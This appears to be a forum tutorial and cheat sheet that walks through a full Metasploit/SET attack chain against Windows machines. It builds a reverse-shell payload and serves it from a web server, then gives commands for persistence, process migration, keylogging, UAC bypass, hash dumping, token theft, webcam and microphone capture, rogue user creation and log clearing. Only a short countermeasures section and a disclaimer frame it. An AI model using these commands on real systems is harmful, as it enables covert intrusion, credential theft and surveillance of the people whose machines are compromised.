MSF SETOOLKIT PARROT OS PENTESTING CODE & EXAMPLES

Code Examples should be used only within the scope of your local laws!
I accept no responsibility for you're actions! Please be ethical!

1st
Update & Upgrade (then reboot):

Code:

sudo apt update && sudo apt upgrade -y

Code:

sudo apt-get --force-yes install -y git apache2 python-requests python-pymssql build-essential python-pexpect python-pefile python-crypto python-openssl

2nd

Install setoolkit:

go into the folder you wish the setoolkit should be and then:

Code:

git clone https://github.com/trustedsec/social-engineer-toolkit.git

change your network settings so you have access from 10.0.0.0 to 192.168.0.0 for example!

Now To run...

Code:

sudo setoolkit

Now select Options in this order:



1, 4, 2

put your ext or int ip depending on how far reach you want (remote ip requires port forwarding to port 5555)

You should be able to use hostnames / Domain Names aswell as ip's

For example: jnet.sytes.net

now you can move payload (before you close setoolkit)



Move Payloads:

(Parrot OS)

Code:

sudo mv /root/.set/payload.exe /home/USERNAME/scripts/payloads
sudo cp /home/USERNAME/scripts/payloads/payload.exe /var/www/html

(Kali)

Code:

sudo mv /root/.set/payload.exe /root/Documents/Scripts/MSF/payloads
sudo cp /root/Documents/Scripts/MSF/payloads/payload.exe /var/www/html

Start your apache2 web server if required!

Code:

sudo service apache2 start

Now you can access via your ip http://youre-ip-here

now if you wish to make things faster you can create a file called Listener.sh here is the content of this file (used later)

Code:


#!/bin/bash
# Usage ./Listener.sh
#
sudo msfconsole -r meterpreter.rc

As you can see it uses the .rc file so heres the content of that file:

Code:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.101
set LPORT 5555
set ExitOnSession false
exploit -j -z
help

Ok lets continue on!


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

(you have to be in a session for upload and execution)!

Upload script txt file

Example:

(Parrot OS)

Code:

upload /home/USERNAME/scripts/MSF/update/script.txt c:\\Users\\Test\\Desktop

(Kali)

Code:

upload /root/Documents/Scripts/MSF/update/script.txt c:\\Users\\Test\\Desktop

Run script.txt: (FRom relative path)

Code:

resource update/script.txt

so if you start from a random path you will need the full path, Example:

Code:

resource /root/Documents/Scripts/MSF/update/script.txt

(so the file can be on the linux side only and still work on remote system without needing to upload)!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



After you have got a target you need to make it persistent! (@ logon)

Code:

run persistence -U -i 5 -p 5555 -r 192.168.0.101

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Dealing with sessions:

Code:

sessions -l          lists all sessions


sessions -i (id)     Interact with this session


sessions -k (id)     Kills sessions with that id

 

after you have joined a session you can add persistence! (do this before all else)!


Now you can migrate


type in an active session:

Code:

ps

to list processes and migrate (pid of explorer.exe

Code:

migrate 437

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

when you migrate to explorer.exe you can run key logger:

Code:

use sniffer


keyscan_start


keyscan_dump


keyscan_stop

You can use connect commands too:

Code:

msfconsole connect -S 192.168.0.15 -P 5555

Here are more random commands you can now go and learn about!

Code:

enable rdp

Code:

run getgui -e

create a new username after you have escalated privs

Code:

getgui -u username -p password





execute -h





execute -H -f cmd.exe -a */c net user username /delete"

Code:




getprivs





use priv

POST commands!
~~~~~~~~~~~~~~

Code:




run post/windows/gather/win_privs





search uac




use bypass uac option! after last command.

Code:

use exploit/windows/local/bypassuac





set payload windows/meterpreter/reverse_tcp








set LHOST 192.168.1.10


set LPORT 8887





session -l





set SESSION 1





exploit





background





sessions -i





sessions -i 2





migrate (pid of explorer.exe)




Code:

run post/windows/gather/hashdump

use jack the ripper to find password from hash!

Code:

run auxiliary/analyze/jt_crack_fast   < may not need

resource text.txt   (.txt file stored in /usr/share/setfile.txt    (text will hold the commands

Code:

cmd


netstat


ipconfig

Code:

resource /folder/file.txt

   (Linux location not windows) it is run on windows but held on linux)!





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

show current directory

Code:

getwd

Code:

Show Linux Directory

lpwd

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


forward to a diff port:

Code:

portfwd

see route:

Code:

route

Token stealing:

Code:

steal_token (PID)

Code:

ideltime

Code:





use sniffer



keyscan_start





keyscan_stop








keyscan_dump




~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Code:




screenshot





webcam_list








webcam_stream -h








webcam_chat








record_mic -h











clearv

(when finished)


More info can be found @

https://www.youtube.com/watch?v=BDBUG75529M&list=PLnjNR4-S-EVqfJWovxEJyb7I0IOkKkoYM&index=74

https://www.youtube.com/watch?v=IvfJgwwq9Xs&index=63&list=PLnjNR4-S-EVqfJWovxEJyb7I0IOkKkoYM

https://www.youtube.com/watch?v=biMkKqWMC5Y&index=58&list=PLnjNR4-S-EVqfJWovxEJyb7I0IOkKkoYM

https://github.com/trustedsec/social-engineer-toolkit


For more msf xploits

exploit-db.com/remote


More random commands:

Code:

use -l

Code:

sysinfo

   < to find username and os etc!

Code:

rdesktop  -u username -p password

Code:

lpwd

< linux current directory (msf)

get resource hacker to change icon of exploit or add a binary to it!



kill a msf session

Code:

sessions -k (id)

Now look into msfvenom, you can make payloads with this aswell!

Countermeasures:


To find if you have any persistent things running on youre system open task manager

look for randomly named executable (close them if you know it is not legit)

after a few seconds it may come back, so do this...

press host key + r to open run dialogue box

type

Code:

msconfig

goto startup

and look for suspicous files running from you're temp directory, deselect these and save exit restart and re check again, also look in your startup locations (on start menu) and for linux os run

top look for anything you think shouldn't be running and google it, remove if required!

now upgrade your anti malware, anti virus, any spyware and update windows though its update service.


block all ports and apps on your router that you dont use and re enable if you do in the future!

get a hardware firewall like Cisco or another good managed switch so that you can only allow traffic you wish to!

now it is a good idea to look into IDS, Intrusion Detection Systems are good!!!


Reply with your comments!

MSF Cheat Sheet

latesthackingnews.com/2015/09/07/metasploit-cheat-sheet-free-download

Unzipping Files Remotely MSF



Extra Content




I used my new Quick Reference Notes

jnet.sytes.net

Code:

sudo service apache2 start

Move Payloads:

Code:

sudo mv /root/.set/payload.exe /home/jay/MSF/payloads

sudo cp /home/jay/MSF/payloads/payload.exe /var/www/html

Code:

sessions -i 1

Persistence:

Code:

run persistence -U -i 5 -p 5555 -r domain.name.com

use sniffer

Code:




keyscan_start


keyscan_dump


keyscan_stop




~~~~~~~~~~~~~~~~~~
1st move in to relative path

Code:

lcd /home/jay/MSF/


upload payload.exe "C:\\payload.exe"

upload update/netcat.zip "C:\\\Backup\\netcat.zip"

upload update/netcat.zip "C:\\Users/Test\\My Documents\\netcat.zip"

upload update/netcat.zip





upload update/7z.exe "C:\\\Backup\\7z.exe"


upload update/script.txt "C:\\script.txt"
upload update/7z.exe "7z.exe"
upload update/7z.dll "7z.dll"




then type

Code:

shell

(in correct location for windows side) Unzip

Code:

7z x *.zip -o*

More On
superuser.com/questions/95902/7-zip-and-unzipping-from-command-line




Use Resorces:

resource update/script.txt


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

meterpreter> use priv
meterpreter> hashdump

cd\
resource script.txt


cd c:\\Users\\test\\Desktop\\


run winenum


https://www.offensive-security.com/metasploit-unleashed/existing-scripts/

Check Out

youtube.com/user/Jamieduk999/videos